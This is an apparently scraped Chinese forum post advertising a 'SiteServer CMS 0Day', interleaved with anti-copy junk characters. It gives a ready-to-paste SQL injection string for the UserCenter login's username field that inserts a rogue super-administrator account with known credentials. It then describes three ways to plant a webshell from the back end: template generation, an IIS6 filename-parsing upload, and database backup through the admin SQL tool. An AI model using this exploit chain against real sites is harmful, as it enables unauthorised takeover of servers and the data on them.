SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版

9 V4 j: O. K8 ystieserver官网:www.siteserver.cn



EXP:

直接访问UserCenter/login.aspx

* p: E2 \8 r6 r. X2 n

用户名处输入：
6 r0 f! N# J2 T' n$ I
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
" M- P( `* r3 x" V& `2 m

3 f0 y  f9 W& O: D8 G* J! x7 Y( {
密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。

% L3 r6 U& P4 c$ z' z: V
3 }6 @3 z& n) x% F4 m, a
之后再访问后台SiteServer/login.aspx用插入的用户登陆
6 _7 j6 V1 ~3 k4 d: t8 e; P: f  L& ?

8 u8 x. B7 \) P  g% L5 }2 q
' U3 Z& [- n; Q9 B- W% Y后台拿webshell的三种方法：

0 f0 U, R9 q6 T0 o4 c' |; }8 n/ M一、
# g& u$ U; g5 Y% M1 {
) r% @0 U. L2 e5 j+ T: H# s6 |站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
! Y/ N. l& y# O% k5 Z! P- s) Q
二、
# k8 }- l$ O* U2 h! g
成员权限-》添加用户-》用户名为：1.asp
; N# c! ?! b6 p% F5 w  U
http://127.0.0.1/usercenter/
4 Q+ q6 Q7 ~7 H# ?
用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell
- i' `9 Q/ X7 O# ?& }
/ \  @! Y; o' I# y$ ~* s# f（ps：后台添加用户时不会验证是否含有非法字符）

三、

6 [* S1 a2 M  j7 |系统工具-》实用工具-》机器参数查看
2 s" N* q5 j% e+ d  P6 t. t/ Z2 m可以看到数据库类型、名称，WEB路径
( U/ s9 m+ j  n! ^& A
系统工具-》数据库工具-》SQL语句查询
+ T# d$ H1 W/ U) Q( }$ s这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。
# x5 c' U7 b0 K  ~" }& g4 R$ u2 M
$ X& l: L" I* G7 u) M